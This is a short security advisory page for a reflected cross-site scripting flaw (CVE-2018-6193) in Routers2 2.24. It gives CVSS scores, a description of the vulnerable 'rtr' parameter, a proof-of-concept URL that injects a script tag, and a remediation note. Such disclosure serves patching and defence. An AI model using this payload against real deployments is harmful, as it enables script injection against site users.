Routers2 2.24 Cross Site Scripting

2018.02.28
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting # Date: 18-01-18 # Vendor Homepage: http://www.steveshipway.org/software/ # Software Link: https://github.com/sshipway/routers2 # Version: 2.24 # CVE: CVE-2018-6193 # Platform: Perl # Category: webapps # Exploit Author: Lorenzo Di Fuccia # Contact: lorenzo.difuccia@gmail.com # Website: https://github.com/lorenzodifuccia 1. Description Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`. 2. Proof of Concept http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers 3. Solution Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`. 4. References https://github.com/sshipway/routers2/issues/1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top